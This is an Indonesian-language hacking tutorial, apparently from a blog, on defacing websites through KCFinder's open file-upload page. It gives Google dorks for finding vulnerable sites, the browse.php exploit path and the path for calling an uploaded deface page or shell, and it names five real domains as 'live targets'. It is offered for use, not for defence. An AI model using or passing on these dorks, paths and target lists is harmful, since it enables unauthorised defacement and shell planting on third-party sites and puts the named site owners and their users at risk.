Assalamualikum Brother
Balik lagi sama gwe.. di tutorial kali ini gwe membagikan cara Deface Proof Of Concept KCFinder upload file.. oke lamgsung saja ngedork dulu cari target...
Bahan-Bahan :
#Hp/Pc
#internet
#Sc depes html/txt
#And kembangin otak lu
Dork :
inurl:/upload/files -kcfinder ext:xml
Dork Narget Langsung : (Bonus Gwe Kan Baik Hehe)
inurl:/kcfinder/browse.php
inurl:/kcfinder/files/upload
inurl:/admin/kcfinder/files/upload
inurl:/panel/kcfinder/upload/files
inurl:/editor/kcfinder/uploadi
inurl:/upload/file
Exploit :
site.go.id/kcfinder/browse.php
Exploit Narget Langsung : (Bonus Gwe Kan Baik Hehe)
/browse.php
(Jika vuln maka akan mucul KCFfinder:/files Nah kamu tingal upload aja script kamu... maka udh terdeface)
Baca Juga : Deface Xmlrpc BruteForce
Cara Panggil Script/Shell :
site.com/upload/files/sclu.html
site.com/patch(kcfinder)/upload/files/sclu.html
(Patch nya tergantung web nya ya dan cara pangil bisa sepinter" Kmu)
Live Target :
https://waveselectronics.com/kcfinder/browse.php
https://smile.com.bd/kcfinder/browse.php
https://spgamepack.net/kcfinder/browse.php
http://cutscompany.co.jp/kcfinder/browse.php
http://kassa.md/kcfinder/browse.php
Sekian tutorial dari saya semoga bermanfaat dan jangan lupa share...
Terimakasih